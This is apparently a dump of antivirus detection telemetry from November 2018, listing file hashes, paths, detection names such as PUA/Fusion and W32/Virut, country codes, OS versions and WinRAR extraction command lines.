  Row(detection=Row(filename='0a78cbb83f36f008d550e3fe037743fb216180ccc39ee2bcbb137df15c51b34b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0A78CBB83F36F008D550E3FE037743FB216180CCC39EE2BCBB137DF15C51B34B', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0a78cbb83f36f008d550e3fe037743fb216180ccc39ee2bcbb137df15c51b34b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:22:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0a78cbb83f36f008d550e3fe037743fb216180ccc39ee2bcbb137df15c51b34b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0A78CBB83F36F008D550E3FE037743FB216180CCC39EE2BCBB137DF15C51B34B', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0a78cbb83f36f008d550e3fe037743fb216180ccc39ee2bcbb137df15c51b34b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:50:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ba07dcc666c77ab9c3af399c1d46d1651616c4fdcea0db4efa33e7088e57942', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BA07DCC666C77AB9C3AF399C1D46D1651616C4FDCEA0DB4EFA33E7088E57942', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='0ba07dcc666c77ab9c3af399c1d46d1651616c4fdcea0db4efa33e7088e57942', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:24:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ba07dcc666c77ab9c3af399c1d46d1651616c4fdcea0db4efa33e7088e57942', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BA07DCC666C77AB9C3AF399C1D46D1651616C4FDCEA0DB4EFA33E7088E57942', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='0ba07dcc666c77ab9c3af399c1d46d1651616c4fdcea0db4efa33e7088e57942', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:24:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0ba07dcc666c77ab9c3af399c1d46d1651616c4fdcea0db4efa33e7088e57942', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BA07DCC666C77AB9C3AF399C1D46D1651616C4FDCEA0DB4EFA33E7088E57942', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='0ba07dcc666c77ab9c3af399c1d46d1651616c4fdcea0db4efa33e7088e57942', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:51:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0baeae4f38c82ac7f2ff54ebc54c82339f53059d0b5d44b5ae58ca2f80ab605e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BAEAE4F38C82AC7F2FF54EBC54C82339F53059D0B5D44B5AE58CA2F80AB605E', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='0baeae4f38c82ac7f2ff54ebc54c82339f53059d0b5d44b5ae58ca2f80ab605e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:24:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0baeae4f38c82ac7f2ff54ebc54c82339f53059d0b5d44b5ae58ca2f80ab605e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BAEAE4F38C82AC7F2FF54EBC54C82339F53059D0B5D44B5AE58CA2F80AB605E', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='0baeae4f38c82ac7f2ff54ebc54c82339f53059d0b5d44b5ae58ca2f80ab605e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:25:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0baeae4f38c82ac7f2ff54ebc54c82339f53059d0b5d44b5ae58ca2f80ab605e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BAEAE4F38C82AC7F2FF54EBC54C82339F53059D0B5D44B5AE58CA2F80AB605E', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='0baeae4f38c82ac7f2ff54ebc54c82339f53059d0b5d44b5ae58ca2f80ab605e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:51:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='devicedisplayobjectprovider.exe', filepath='d:\\windows\\system32\\DeviceDisplayObjectProvider.exe', filesize=1216000, name='W32/Virut.Gen.#M1.#R1'), hash='0bbcc05ca445389c2f2b949db94161999b78ccb4e65e874ba11c9f4f5a2c5240', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:29:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155314-3ce29d5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47786593\\AVSCAN-20181102-155206-32FCC3D1\\AVSCAN-20181102-155314-3CE29D5E', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:53:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155308-3bf07c5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47786593\\AVSCAN-20181102-155206-32FCC3D1\\AVSCAN-20181102-155308-3BF07C5E', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:53:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155319-3d929226', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47786593\\AVSCAN-20181102-155206-32FCC3D1\\AVSCAN-20181102-155319-3D929226', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:53:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\X7E2XT0Z\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\VSSVC.exe', parentsize=None, timestamp='2018-11-02T00:09:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005821-ccb67faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005821-CCB67FAA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:10:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005852-cfb22bfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005852-CFB22BFC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005852-cfb22bfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005852-CFB22BFC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005821-ccb67faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005821-CCB67FAA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005821-ccb67faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005821-CCB67FAA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005852-cfb22bfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005852-CFB22BFC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:16:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='991851e71c62c5e345e376a662477bb3075cf309', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\991851e71c62c5e345e376a662477bb3075cf309', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:55:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005821-ccb67faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005821-CCB67FAA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005852-cfb22bfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005852-CFB22BFC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102917-b9c7aad9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57b9abd2\\AVSCAN-20181102-102813-AE3A2179\\AVSCAN-20181102-102917-B9C7AAD9', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:29:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102908-b8119da5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57b9abd2\\AVSCAN-20181102-102813-AE3A2179\\AVSCAN-20181102-102908-B8119DA5', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:29:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005852-cfb22bfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005852-CFB22BFC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005852-cfb22bfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005852-CFB22BFC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005821-ccb67faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005821-CCB67FAA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005821-ccb67faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005821-CCB67FAA', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103006-c28c229e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57b9abd2\\AVSCAN-20181102-102813-AE3A2179\\AVSCAN-20181102-103006-C28C229E', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120451-2ce83bae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120451-2CE83BAE', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120444-2baa87a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120444-2BAA87A6', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120434-2a08d1f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120434-2A08D1F5', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120510-2ff5a1e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120510-2FF5A1E8', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120446-2bff2557', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120446-2BFF2557', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120441-2b4143f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120441-2B4143F0', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120440-2b0025e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120440-2B0025E2', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151607-b461cb71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ae15aaa\\AVSCAN-20181102-151239-915D24CF\\AVSCAN-20181102-151607-B461CB71', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T20:16:07Z'), dt=datetime.date(2018, 11, 2)),
